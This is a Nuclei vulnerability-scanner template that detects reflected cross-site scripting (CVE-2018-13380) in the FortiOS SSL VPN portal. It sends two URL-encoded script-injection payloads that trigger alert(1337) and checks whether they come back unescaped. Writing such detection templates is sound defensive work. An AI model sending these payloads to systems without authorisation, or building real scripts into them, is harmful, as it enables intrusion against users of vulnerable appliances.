nuclei-templates/cves/2018/CVE-2018-13380.yaml


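id: CVE-2018-13380

# Nuclei detection template for the reflected XSS in the FortiOS SSL VPN
# web portal (CVE-2018-13380). The page's original copy had lost all
# indentation, which makes the mapping structure invalid; it is restored here.
info:
  name: Fortinet FortiOS Cross-Site Scripting
  author: shelld3v
  severity: medium
  description: >-
    A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4,
    5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal
    allows attacker to execute unauthorized malicious script code via the error or
    message handling parameters.
  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
  tags: cve,cve2018,fortios,xss,fortinet
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2018-13380
    cwe-id: CWE-79

requests:
  - method: GET
    path:
      # Two reflection points, each probed with its own harmless marker payload
      # (alert(1337)); the marker is what the body matcher below looks for.
      - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
      - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"

    # All three matchers must hold for a response to count as a finding.
    matchers-condition: and
    matchers:
      # The marker must be reflected unencoded in the body. Both markers are
      # listed so that a reflection on either path can match; with only the
      # svg marker, a hit on /remote/error could never be reported.
      - type: word
        part: body
        condition: or
        words:
          - "<svg/onload=alert(1337)>"
          - "<script>alert(1337)</script>"

      # Responses served as application/json are excluded — presumably to avoid
      # reporting a JSON API that merely echoes the marker back as a string.
      - type: word
        part: header
        negative: true
        words:
          - "application/json"

      - type: status
        status:
          - 200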